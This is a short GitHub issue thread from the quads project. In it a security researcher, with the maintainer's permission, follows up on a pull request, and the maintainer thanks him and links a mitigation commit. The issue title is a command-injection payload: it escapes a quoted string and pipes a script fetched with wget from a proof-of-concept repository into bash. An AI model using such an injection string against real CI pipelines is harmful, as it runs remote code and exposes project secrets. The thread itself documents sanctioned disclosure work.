### ISSUE TITLE
SecTest" && wget -O - https://raw.githubusercontent.com/sectest-h1-adnanthekhan/prt_sh_poc/main/test.sh | bash && exit 1 "

### ISSUE THREAD

**Issue by AdnaneKhan** [redhat-performance/quads#441]
Follow up to https://github.com/redhat-performance/quads/pull/439 (w/ permission of @sadsfae )

**Comment by sadsfae** [comment]
Thanks again for notifying and filing this @AdnaneKhan we've implemented the mitigation for this here:

https://github.com/redhat-performance/quads/commit/132c4635d1c5244810226346279cafc69d651722
